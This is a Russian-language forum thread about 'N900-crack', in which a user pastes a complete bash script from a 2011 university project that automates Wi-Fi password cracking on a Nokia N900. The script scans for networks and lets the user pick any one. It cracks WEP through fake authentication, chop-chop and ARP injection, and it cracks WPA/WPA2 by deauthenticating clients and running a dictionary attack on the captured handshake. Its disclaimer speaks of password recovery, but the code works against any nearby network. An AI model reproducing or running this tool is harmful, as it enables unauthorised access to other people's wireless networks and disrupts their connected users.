Re: N900-crack (восстановление забытого пароля AP с помощью N900)
Хм...
Я правильно понимаю, что этот скрипт и aircrack "не дружат" с последними версиями kernel-power?
Вы не вошли. Пожалуйста, войдите или зарегистрируйтесь.
Форум MaemoWorld.ru → Программы для MeeGo и Maemo (Nokia N9 / N900 / ...) → N900-crack (восстановление забытого пароля AP с помощью N900)
Чтобы отправить ответ, вы должны войти или зарегистрироваться
Хм...
Я правильно понимаю, что этот скрипт и aircrack "не дружат" с последними версиями kernel-power?
скрипт так не проще в шапку зачем качать?
#! /bin/bash
# n900crack.sh
#Middlesex University
#Author: Krystian Majda M00221109
#email: niervol@gmail.com or km857@live.mdx.ac.uk
#Date: 18 April 2011
#This bash script is a deliverable of the final year project, CCM3422.
#Project superviser: Dr Jonathan Loo
#Second superviser: Dr Robert Colson
clear
echo " n900crack.sh - by Krystian Majda km857@live.mdx.ac.uk"
echo " DISCLAIMER!!!"
echo This script is intended for educational, testing and password recovery purposes.
echo It is against the law to crack others networks.
echo I DO NOT TAKE ANY RESPONSIBILITY FOR INCORRECT OR ILLEGAL USE OF THIS SCRIPT
echo #
echo "WEP & WPA/2 cracking automation script for Nokia N900"
echo "required: aircrack-ng v1.0 and injection drivers: wl1251-meamo"
echo #
#directories and variables
crackdir="/home/user"
driverdir="/home/user/MyDocs/wl1251-maemo/binary/compat-wireless/"
scantime=20
nic="wlan0"
scanprefix="scan"
scanfile=$scanprefix"-01.csv"
networklist=networks.txt
#load injection drivers
cd $driverdir
sudo sh load.sh >>/dev/null 2>&1
#change directory to crackdir
cd $crackdir
########## scan & print loop #################
while [ "$choice" -eq "0" ]; do
#remove previous scannig data and networks list
rm -f $scan*.csv
rm -f $networklist
#scan for available networks
sudo airodump-ng -w $scanprefix --output-format csv $nic >>/dev/null 2>&1 &
echo "Scaning in progres... Please wait..."
sleep $scantime
sudo killall -q airodump-ng
echo #
echo "The following networks are available. Please note:"
echo "- Power field indicates signal level, the closer to 0 the better"
echo "- associated clent is required to crack WPA/WPA2, 'wordlist.txt' file is used for
dictionary attack"
#print/list available networks
linenumber=1
cat $scanfile | while read line; do
if echo "$line" | grep -q " 0."
then
#print networks with numbers and store in networklist
echo "0"$linenumber ")," $line | cut -d, -f1,2,5,7,10,15 | tee -a $networklist
linenumber=`expr $linenumber + 1`
else
#print others without numbers
echo $line | cut -d, -f1,4,6,9,14
fi
done
#read choice from user input
read -p "Enter number of the network to crack or '0' to rescan: " choice
clear
done
########### end of scan & print loop ############
#variables needed for attack
apmac=`cat $networklist | grep "$choice )," | cut -d, -f2`
apchanel=`cat $networklist | grep "$choice )," | cut -d, -f3`
apencryption=`cat $networklist | grep "$choice )," | cut -d, -f4`
apname="$(cat $networklist | grep "$choice )," | cut -d, -f6 | cut -c 2- | sed 's/ /\ /g')"
sourcemac=`sudo ifconfig | grep wlan0 | cut -d" " -f10 | cut -d- -f1,2,3,4,5,6`
#decide on attack type
case "$apencryption" in
#unencrypted networks
*OPN*) echo "$apname" " is open/unencrypted!";;
############################################################################
# Cracking WEP
*WEP*) echo Cracking WEP encryption of $apname network, please be patient
echo when successfully cracked, password will be displayed on the screen and saved to
echo "$apname"".txt"
#WEP relevant variables
ivs=0
minivs=30000
#removing previous files if existing
rm -f "$apname""-01.cap" "$apname""-01.csv" "$apname""-01.kismet.netxml"
rm -f "$apname""-01.kismet.csv" replay*.cap "$apname"".txt"
rm -f arp-request.cap
rm -f replay_dec*.xor
rm -f replay*.cap
#collecting #ivs
sudo airodump-ng -c $apchanel -w "$apname" --bssid $apmac $nic >>/dev/null 2>&1 &
sleep 2
#fake authentication
sudo aireplay-ng -1 900 -e "$apname" -a $apmac -h $sourcemac $nic >>/dev/null 2>&1 &
sleep 2
#chop chop attack to get PRGA
sudo aireplay-ng -4 -b $apmac -h $sourcemac -F $nic
#creating arp-request from PRGA
sudo packetforge-ng -0 -a $apmac -h $sourcemac -k 255.255.255.255 -l 255.255.255.255 -y replay_dec*.xor -w arp-request.cap
#injection of the arp packet
sudo aireplay-ng -2 -r arp-request.cap -h $sourcemac -F $nic >>/dev/null 2>&1 &
#waiting for minimum #ivs number
while [ $ivs -lt $minivs ]; do
sleep 30
ivs=`cat "$apname""-01.csv" | grep "$apname" | cut -d, -f11`
echo $ivs "of #ivs collected! Waiting for at least: " $minivs
done
#attempting to crack every 120s with new #ivs every time and saving password to file
while [ ! -f "$apname"".txt" ]; do
clear
sudo aircrack-ng -l "$apname"".txt" "$apname""-01.cap" &
sleep 120
sudo killall -q aircrack-ng
done
#kill no longer needed processes
sudo killall -q airodump-ng
sudo killall -q aireplay-ng
#outputing stored password if cracked
if [ -f "$apname"".txt" ]; then
echo "#########################################"
echo " ####### Congratulations! ########"
echo The cracked password for $apname is: `cat "$apname"".txt"`
fi
;; ##### end of WEP attack
#######################################################################
######## Cracking WPA/WPA2
*) echo Cracking WPA/WPA2 encryption of $apname network
echo when successfully cracked, password will be displayed on the screen and saved to
echo "$apname"".txt"
#WPA relevant variables
dictionary=wordlist.txt
handshake=handshake.txt
nohandshake=1
#deleting previous files if existing
rm -f "$apname""-01.cap" "$apname""-01.csv" "$apname""-01.kismet.netxml"
rm -f "$apname""-01.kismet.csv" replay*.cap "$apname"".txt" $handshake
#catching handshake
sudo airodump-ng -c $apchanel -w "$apname" --bssid $apmac $nic >>$handshake 2>&1 &
sleep 5
#deauthenticating clients until handshake captured
while [ "$nohandshake" -eq "1" ];do
echo Waiting for legitimate client and for full, valid 4-way handshake capture. Please, wait...
#deathenticate client
sudo aireplay-ng -0 2 -a $apmac -c ffffffffffff $nic >>/dev/null 2>&1 &
sleep 15
grep -q "WPA handshake" $handshake && nohandshake=$?
done
#kill no longer needed processes to free-up some resources
sudo killall -q airodump-ng aireplay-ng
#brute-force the captured handshake against dictionary and save password to file
#computing power hungry
sudo aircrack-ng -l "$apname"".txt" -w $dictionary -b $apmac "$apname""-01.cap"
#output cracked password again from file if existing
if [ -f "$apname"".txt" ]; then
echo "#########################################"
echo " ####### Congratulations! ########"
echo The cracked password for $apname is: `cat "$apname"".txt"`
echo Regularly changed, strong WPA password is recommende!
else
echo Unfortunately, password was not found in the provided dictionary: $dictionary
fi
;; ####### end of WPA/WPA2 attack
esac
#unload the drivers
cd $driverdir
sudo sh unload.sh >>/dev/null 2>&1
sleep 2
exit
#end
Чтобы отправить ответ, вы должны войти или зарегистрироваться
Форум MaemoWorld.ru → Программы для MeeGo и Maemo (Nokia N9 / N900 / ...) → N900-crack (восстановление забытого пароля AP с помощью N900)
Форум работает на PunBB, при поддержке Informer Technologies, Inc
Currently installed 6 official extensions. Copyright © 2003–2009 PunBB.
Сгенерировано за 0.078 секунды (93% PHP — 7% БД) 11 запросов к базе данных